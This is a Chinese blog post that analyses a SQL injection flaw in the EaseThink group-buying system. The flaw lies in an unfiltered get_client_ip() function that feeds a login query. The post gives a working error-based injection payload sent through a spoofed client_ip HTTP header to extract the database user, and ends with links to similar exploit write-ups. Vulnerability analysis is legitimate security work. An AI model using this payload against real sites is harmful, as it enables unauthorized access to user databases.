易想团购系统通杀SQL注入漏洞分析及利用
2014-05-12 14:45
941 查看
刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。
找到get_client_ip()函数:
果然没过滤,看了下很多地方用到这个函数。
比如:
团购系统嘛,其实不用看代码,登陆的这些地方必定会用这个函数。
果断的,登陆的时候在http头里面加了个client_ip,值为127′
看图:
报错注入,很简单吧,
exp:
火狐插件增加client_ip头部,对应值为
这套程序用的thinkphp的框架,回头看看有没有代码执行。
找到get_client_ip()函数:
// 获取客户端IP地址 function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); }
果然没过滤,看了下很多地方用到这个函数。
比如:
if($_REQUEST['act'] == 'verify') { $id = intval($_REQUEST['id']); $user_info = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."user where id = ".$id); if(!$user_info) { showErr($GLOBALS['lang']['NO_THIS_USER']); } $verify = $_REQUEST['code']; if($user_info['verify'] == $verify) { //成功 $_SESSION['user_info'] = $user_info; $GLOBALS['db']->query("update ".DB_PREFIX."user set login_ip = '".get_client_ip()."',login_time= ".get_gmtime().",verify = '',is_effect = 1 where id =".$user_info['id']); $GLOBALS['db']->query("update ".DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$user_info['email']."'"); $GLOBALS['db']->query("update ".DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$user_info['mobile']."'"); showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/"); }
团购系统嘛,其实不用看代码,登陆的这些地方必定会用这个函数。
果断的,登陆的时候在http头里面加了个client_ip,值为127′
看图:
报错注入,很简单吧,
exp:
火狐插件增加client_ip头部,对应值为
‘ and (select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b)#
这套程序用的thinkphp的框架,回头看看有没有代码执行。
相关文章推荐
- 最新易想团购系统通杀SQL注入漏洞分析附利用exp
- Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战
- DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析
- 网络攻防实战:老Y文章管理系统V2.2注入漏洞分析与利用
- SQL注入漏洞的分析与利用(三)
- SQL注入漏洞的分析与利用(二)
- SQL注入漏洞的分析与利用(一)
- 易想(easethink)团购系统ajax文件导致SQL注入漏洞
- [代码审计]DM企业建站系统v201710 sql注入漏洞分析 | 新版v201712依旧存在sql注入
- Windows下利用系统漏洞提权
- 深入浅出 分析Linux系统内核漏洞问题
- 从MS03-049漏洞利用看调试系统进程
- [漏洞分析] simple-log_v1.3.1中存在的SQL注入漏洞
- CRLF Injection漏洞的利用与实例分析
- Openssl“心脏出血”漏洞分析及其利用
- SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
- JAVA Apache-CommonsCollections 序列化漏洞分析以及漏洞高级利用
- PHP文件包含漏洞原理分析和利用方法
- SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
- 尽最大可能分析上传源码及漏洞利用方式